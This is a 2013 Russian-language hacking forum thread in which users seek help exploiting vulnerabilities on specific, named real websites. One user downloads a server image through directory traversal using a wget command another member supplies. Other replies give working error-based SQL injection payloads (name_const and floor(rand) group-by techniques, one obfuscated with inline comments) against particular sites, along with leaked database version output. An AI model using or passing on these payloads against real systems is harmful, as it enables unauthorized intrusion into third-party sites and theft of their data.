10.02.2013, 18:05
|
|
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами:
7074326
Репутация:
0
|
|
Нашел и хочу скачать образ системы на сайте (доступно через directory traversal), но acunetix выдает ошибку, не могу мол так много качать и сбрасывает соединение (как повысить лимит, не нашел), если скормить ссылку браузеру, он выдает ахинею (возможно, с потерей информации) и при сохранении ее в файл образ не собирается. У разных браузеров файл получается разного размера, так что этот путь неверен. Flash Get ругается на ссылку и не хочет качать, естественно, ведь она имеет вид site?id=etc/linux.img
Может кто знает, какой проге надо это безобразие скормить, чтобы нормально скачалось?
Спасибо
|
|
|
10.02.2013, 19:00
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
wget site?id=etc/linux.img -O linux.img
|
|
|
|
10.02.2013, 19:51
|
|
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами:
7074326
Репутация:
0
|
|
Сообщение от cat1vo
wget site?id=etc/linux.img -O linux.img
Спасибо, получилось, только образ все равно не собирается почему-то (собирал, используя R-studio)
|
|
|
|
12.02.2013, 15:52
|
|
Новичок
Регистрация: 01.08.2010
Сообщений: 8
С нами:
8305526
Репутация:
0
|
|
Сообщение от None
http://www.personalguide.ru/news/page32
Возможно ли раскрутить?
|
|
|
|
12.02.2013, 16:21
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от narviss
Возможно ли раскрутить?
допустим можно.
что дальше?
|
|
|
|
12.02.2013, 17:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от narviss
Возможно ли раскрутить?
Можно. Например так
_ttp://www.personalguide.ru/news/page33_'and(select*from(select+name_const(version( ),1),name_const(version(),1))a)='1/
Duplicate column name ' 5.3.7-MariaDB-mariadb116~squeeze-log'
|
|
|
|
13.02.2013, 17:59
|
|
Новичок
Регистрация: 13.02.2013
Сообщений: 0
С нами:
6970646
Репутация:
0
|
|
Сообщение от None
https://site.com/cgi-bin/fnc/drop_flag.pl?id=91&l=&s=&shop_id=%5c
Сообщение от None
DBD::mysql::db do failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '91'' at line...
Нашел с помощью сканера. Может, кто подскажет как раскрутить? Не могу понять, куда писать запросы.
Как понял, знак %5c - это /
|
|
|
|
13.02.2013, 19:28
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Yan.Total
Нашел с помощью сканера. Может, кто подскажет как раскрутить? Не могу понять, куда писать запросы.
Как понял, знак %5c - это /
Сайт покажи =/
|
|
|
|
16.02.2013, 00:36
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
С нами:
8994048
Репутация:
0
|
|
подскажите, можно что-то сделать с
http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'
|
|
|
|
16.02.2013, 00:42
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от cipa21
подскажите, можно что-то сделать с
http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'
Это можно сделать
_http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/count(*)/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/'
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
